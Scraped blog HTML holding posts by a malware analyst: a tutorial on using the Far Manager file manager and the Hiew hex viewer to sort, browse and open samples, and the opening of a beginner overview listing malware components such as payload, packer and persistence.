<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F5 goes to entry point</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F6 displays section header</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F9 shows exports if it is a dll</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">F10 is used to show data directories</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
F7 shows import table</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 624px;"><img height="167" src="https://lh6.googleusercontent.com/rGIU2V9ZT7j99_5uPvhMYO8TgJX8d0DAAFUtBfHkFMtatD3W_jE-F0kXAzfR_3UxiIRcRofARaggz3ucIgWO6kCe2bfu1V0BeC7n8qdOvlu6yTHl6saDJAm_wforFZJ5q8I3UO3i" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;">To go to a section in the PE file you can press enter. To go to the Entry point go to header then press F6. Then press enter to see the disassembly at entry point.</span></span></div>
<div dir="ltr" id="docs-internal-guid-28e2d0d9-7fff-b21a-9471-b8bcc7b5fa21" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 231px; overflow: hidden; width: 624px;"><img height="231" src="https://lh6.googleusercontent.com/e_4ajCDjkb2nifJuo75_tKlGan9dsfXrF9NWmIQ-rPEG1bsIwYgccXpq066-0d2UNSo5QXwOkLXn7kfLMI4gAXTrhLi-8s00UVAEZm1izZQNX779s9iSFWx_PuPqDbJucruWFPon" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Hiew has got lot more features . One can go through the help or play around by pressing different keys. Though the tool does not have too many features still can save time of researchers.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-32499276192516103952019-07-30T22:37:00.002-07:002019-07-30T22:38:18.881-07:00Using Far Manager and Hiew duo in malware Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
I have been using the <b>Far Manager</b> and <b>Hiew</b> Combo for a really long time while doing Malware Analysis . (Unfortunately I could not fix the formatting issues to words the end of the blog)<br />
<div>
<br />
<div>
Far Manager is not a malware Analysis tool at all but an alternative to windows explorer . But certainly it solves some basic level of problems for malware analysis like sorting based on size, see hidden files ,view processes . Far manager is a command line alternative to <b>windows Explorer</b>(Explorer.exe) which is used to browse the file system .It speeds up your work as it is you can browser your file system quicker the the conventional windows explorer . you can do a lot of quick stuff using keyboard shortcuts . Don't worry about remembering shortcuts. After sometime it will be on your finger tips.</div>
<div>
<br /></div>
<div>
You can download far manager from https://farmanager.com/. You can run it by extracting and double clicking the Far.exe .Default far manager has two panes left and right. you can two locations of you file system at a time.<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">left side pane is displaying contents in folder "C:\Program Files\7-Zip" and right side pane is </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">displaying contents in folder </span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">"D:\books\c-prog" . you can browse through files in the directories using <b>up and down arrow keys</b>. cursor is the green color.</span></div>
<div>
<div dir="ltr" id="docs-internal-guid-696e1277-7fff-5f5e-8e97-6b6cacc5f2a6" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="339" src="https://lh3.googleusercontent.com/HnNlEetCaW1xK2CxiM3wL4gvLs7tqBfg9nQCEu58jHKqNQtI7Jg8gyGzyN6R3GSZTFlERLBwnDTjGz7Bv7g5ep6IEJzTvxHc6A5jKE28SswV27-Dd0a6JUbGf4fS4H5O9SWsFUo0" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
At the bottom you can see 1.Help, 2.User Menu,3.View..... 5.Copy</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This means F5 is used for copy. If you want to explore more options press the keys left ctrl+ right ctrl, left shift, right shift , alt and see whether these options change. </div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" id="docs-internal-guid-af91c4ca-7fff-14da-00ee-e746a77130cc" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="569" src="https://lh3.googleusercontent.com/Qmwz5Lc05Lh4VTUPqMFgnPNZ54BjXSl9wIFNWo-bzC9cDQJLnl_vPNUTpfc54fp5Nw8nT7XFrTEU15OkA97ctQueF5LC9L1skFFfC4Bh77qu6a0QZvVRckscqiIVaks1AO9Cl0Qo" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
If I press <b>ctrl,</b> I see <b>12-sort </b>. Now if I press ctrl+F12 let's see what happens .</div>
<div dir="ltr" id="docs-internal-guid-cda4301e-7fff-b34c-03d2-27945b2aa04a" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="616" src="https://lh5.googleusercontent.com/9BlopxI5FjTIMq3KGU3m3aD8HKPnaRup9A-obval3o7OFNyVGjB-izGmxMM8yKOZh5Ai96m15B2tpc2pXipsHqqGzcEwm3INeti2hgW_LsoJhK6ljcgAQqujcjmDt0lEHmQlTcTu" style="border: none;" width="501" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
You can sort the files in the directory using size,extension etc.<b> Note:</b>This can be useful for analysts when they are dealing with huge set of files. Often malwares in a same family which are close to each other have similar size. You can sort by size and <b>cluster</b> the same size files.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">The cursor or control is on <b>left pane</b> on the file "<b>History.txt</b>" . If you want to copy paste History.txt from </span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">"C:\Program Files\7-Zip" to </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">"D:\books\c-prog" you need to press <b>F5</b>. For cut paste you need to press <b>F6</b>. See how quick it is to do a cut paste. Multiple files can be copy pasted at same time. to <b>select</b> a file to copy paste you need to press "<b>shift+down/up arrow</b>" key. Same keys for de-selecting a selected file. To select all the files below the cursor you need to <b>"shift+right arrow" </b>for above<b> </b> </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">"shift+left arrow"</b><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">. you can then use F5 or F6 for starting the copy .</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">to shift between the panes or go from </span><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"> </span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">"C:\Program Files\7-Zip" to </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">"D:\books\c-prog" , you can press <b>tab</b>. You can use use <b>up and down arrow</b> keys to browse the files in same directory.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">The exe is<b> green</b>(<b>7z.exe,unistall.exe</b>) colored text and directory is <b>white("lang")</b>. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">If you want to open a file in directory you just need to move the corsor there and then press <b>enter</b>. An exe will execute and a .txt file will open in notepad. <b>Hidden files</b> are seen in light blue color. This can be often used in malware analysis if the malware hides any of it's dropped file by using hidden properties of windows .</span></span></div>
<div dir="ltr" id="docs-internal-guid-7e22ef1c-7fff-53c8-f465-0247b5ef95a9" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="369" src="https://lh5.googleusercontent.com/A-dm_pwaFa7Q_93CVwkUyEkCmpEYneWQigKEpE0AJWybUhbtfieEua5PHqJX4AXbCh1Ij_Uj3AYngt3u0ZSkIjhmAYtFVJyLOWbaIG3bSIlWKB9R4_1ydAuQP2mnbSkDooC9x2nF" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" id="docs-internal-guid-7474962e-7fff-065d-3f77-b60b9482aee5" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">You can see more details of files in the directory by pressing “”</span><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">left Ctrl</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> + </span><span style="font-family: "arial"; font-size: 11pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">3”</span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">. you can see the extension, file size, creation date time</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="343" src="https://lh5.googleusercontent.com/pJf1MwV26Ub4cibYlDnZgYqYiSF4KnUmBI5-6fyuN07iC0DvKKqcJU0IBc3FxJ193IUsMi7b_Lc7qdc4xZGso5F2DUg0pkt170o_dv4O5jj7cYxt3c6NHtCh2O86EKtcBbm4DcNb" style="border: none;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">We can also browse directories using keyboard shortcuts .If you want to go into the "<b>lang</b>" directory move your cursor to lang using the up or down arrow key and then press enter. If you want to go to the directory above press "<b>Ctrl + pgUp</b>".</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: "arial";"><span style="color: red; font-size: 14.6667px; white-space: pre-wrap;"><b>Searching Files in a Directory:</b></span></span><br />
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">This is done by pressing <b>alt+(alphabets of the key- u can use wildchars too)</b>.</span></span><br />
<div dir="ltr" id="docs-internal-guid-28d430d3-7fff-e2a2-21ea-d24395661a73" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 264px; overflow: hidden; width: 624px;"><img height="264" src="https://lh3.googleusercontent.com/lDle88xhVLIw0hKZSbVhLbW2cpimU-gTI6htPc3mYKFlJs8csg22jzouh9u__AsFnW2OAi16BBIcowQEZ7z_Zmg_tAcz8i1uxPauVb8J3DJD0S3TgRyUh43bNLjlTAwfhR1h84IG" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<span style="font-family: "arial";"><span style="color: red; font-size: 14.6667px; white-space: pre-wrap;"><b>Sorting files in a directory:</b></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
you can sort files in a directories by pressing F12. This gives you option to sort by size,extension,write time etc .you can use this feature to cluster similar size files etc<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 567px; overflow: hidden; width: 487px;"><img height="567" src="https://lh6.googleusercontent.com/BPDnynYdoZHCCqhZpdvui-gE9xc5fgDxlYQARvQu6Xe6IbJcGeuF-rz_f4r0M1FAnl82SCGQLBlNaZEftBKQoFfzR7uhsfFfDZCihNJNWaXN77Bi2Zaz4yziyuTyd64BjcFfw4ag" style="margin-left: 0px; margin-top: 0px;" width="487" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
<b><span style="color: red;">Creating shortcuts to directories and accessing them:</span></b></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
save shortcuts to directories- you can save upto 10 directories in shortcut with keys 0 to 9.</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
To create shortcut for directory go to the directory on <b>number 1</b> and press :<b>ctrl+shift+1</b> . </div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Now to go to the shortcut saved in <b>number 1 key</b> press <b>right ctrl +1</b> . similarly you can create shortcuts to 10 directories .<br />
<br />
<b><span style="color: red;">Adding tool Shortcuts to Far Manager</span></b>:<br />
As malware researcher we need to use all lot of tools on the samples. you can add shortcuts of tools to far manager. I want to add hiew (hacker's view) to my far manager and would like to open samples with it.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Before adding hiew to Far, I have downloaded hiew from http://www.hiew.ru/ and extracted to "D:\tools\hiew</span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">" in my system. I need to <b>Hiew32Demo.exe</b> to the Far manager.</span></div>
<div dir="ltr" id="docs-internal-guid-07cd5bf3-7fff-853e-aafd-a99c34ce595b" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 356px; overflow: hidden; width: 540px;"><img height="356" src="https://lh4.googleusercontent.com/FGMorII5mmcH5k7Zhwa7FR0qUmhnctTGdr5P9UOP41gl3FxpdUrRNNzrUTw5GHQ94VHSt_s-NQkpQS6QukTQ-64UMijpd6SkLqu9VTo0BjQwL6Y1YF1YWVUjm2zz1h0EVrYKYpJS" style="margin-left: 0px; margin-top: 0px;" width="540" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> to open a file in hiew ,from command line, I need to type the command <b>hiew32demo.exe </b></span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">file__full_path</b><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> where </span><b style="font-family: Arial; font-size: 14.6667px; white-space: pre-wrap;">file__full_path </b><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">is the parameter to hiew32demo.exe .</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
To add a command I need to press <b>F2. </b><br />
<div dir="ltr" id="docs-internal-guid-a0408c1a-7fff-4e12-652c-6fd59e18610d" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<img height="136" src="https://lh6.googleusercontent.com/QkONqUZIsCdO9Og4Eqc-VtQD_k2rxtUFWdkoe1SQLv5RWOshrdOEcJEEAagrw14hKdYLTQZALWUsptWqgqzVJGEr3UVG_-Y0vVOpY6A0es5FgzTydjvRfEaRe9cYUFvbW3nKKx4c" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="431" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
you can see a window popping up over far manager which asks you to press Del,Ins,F4, Alt+F4 keys . you can try out each of these keys. To add Hiew I press <b>Ins key</b>.</div>
<div dir="ltr" id="docs-internal-guid-d19a9740-7fff-e244-fc5b-89cfda98d557" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;"><img height="159" src="https://lh4.googleusercontent.com/SFCR_LcafjXU6-lVGA55_kQy-l58iCFBvrDHJ8P_6709akkbTL97dn14kQb3X6tK860n9xhyK1XC3XPQzOCbXsRX-mVPTaYb8tW4Y-64jte9jqB_9Dso_JHq8T6Ejw-1MqMf-HRh" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;">After I press a insert key I get a windows like below.</span></span><img height="376" src="https://lh6.googleusercontent.com/Y_o7KsWcLUUbkjT4drPJZygyXOx5A9EU1Ef0pZZJEB8sKGe3NET7Fnr7NEQ1TZQq0nENcSYQ-GVu2A2IhViKUjYCNUdXUx589y4a-hAQsPk4ZfxWipGU4WjlfTv-H3Yu7p0xnFhN" style="margin-left: 0px; margin-top: 0px;" width="624" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;">hotkey - stands for shortcut key. I have put <b>h </b>here.</span></span><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"> Label is just for your reference ,I have added hiew here. I commands I have put </span><b style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">D:\tools\hiew\hiew32demo.exe "!.!"</b><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"> . Here "!.!" means selected file which is the parameter to hiew32demo.exe .</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 624px;">Now in order to save the command use arrow button to reach [<b>ok</b>] in menu and then press enter.</span></span><img height="242" src="https://lh4.googleusercontent.com/TFffszk6A2j6uv0WAnUO-RwGCGvy-1fbI2D3gVWWoxwfNW7ldkroBUFTcW2SaIKjxSHbJn0rM5k_Sc4lDeJgsCn359Ap0s8XeGuQytzR9NxPvFgqKfgyOqDVryPR2lh5AU7wXqLf" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="400" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Now hiew is added to my tools. In order to open a file in hiew I can browse to a files then press </span><b style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">F2+h</b><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"> to open the file in Hiew.</span></div>
<div dir="ltr" id="docs-internal-guid-2c41a1fb-7fff-ffe2-947c-74d0b23615d2" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 357px; overflow: hidden; width: 453px;"><img height="357" src="https://lh4.googleusercontent.com/SR8O_dhIjZKbrFpHg859YRcYe6XN8L7wf5S82Jm7vJVkkpUaPJfozbVHYvHaxoknIX5R7DBFpwl8Xoq7VXfzr3XwHP39hvSQaj1kzfz6jsHSkQeJdZmrb-KCr5oCOPX55RKxBFmU" style="margin-left: 0px; margin-top: 0px;" width="453" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Hiew to be continued in next blog.</span></span></div>
</div>
</div>
</div>
</div>
abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-10574615417304590392019-07-16T20:09:00.003-07:002019-07-17T06:46:03.813-07:00Simplifying Malware Analysis:<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-04d3e32b-7fff-c20f-f2b6-77ba8ce17562" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">The article is meant for people who want to start their career in Malware Analysis . Malware analysis is a growing need in the cyber security industry with increase in attacks involving malware. The article talks about how to approach malware analysis. Before that it’s important to know how the malware works. Here are some of the topics I would be covering in the article.</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Malware Components </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Malware Analysis Steps</span></li>
</ol>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: red; font-family: "arial"; font-size: 14pt; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Malware Components</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">In order to understand malware in a better manner I have broken down the malware into components. Below is a diagram for understanding the various components.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">I have broken down the malware into the following components:</span><br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Payload</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Packer</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Persistence </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Armoring</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Stealth</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Communication</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Propagation</span></li>
</ol>
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://lh4.googleusercontent.com/273qArxVEAmOZ2_1uoqFg26TThcjojhqNDYb3WpXjLn5w8w4YxQ7BSy5jQjQ9H-QorNBAjSFNv2Fut7XFIZBs9an9BLDO_ccQ9kWDngNvJbWRUaIEiruxeRPseflW8meuRpgXG7e" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="180" src="https://lh4.googleusercontent.com/273qArxVEAmOZ2_1uoqFg26TThcjojhqNDYb3WpXjLn5w8w4YxQ7BSy5jQjQ9H-QorNBAjSFNv2Fut7XFIZBs9an9BLDO_ccQ9kWDngNvJbWRUaIEiruxeRPseflW8meuRpgXG7e" style="border: none;" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Malware Components</td></tr>
</tbody></table>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Payload is the mandatory component while malware while rest are optional.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<ul style="text-align: left;">
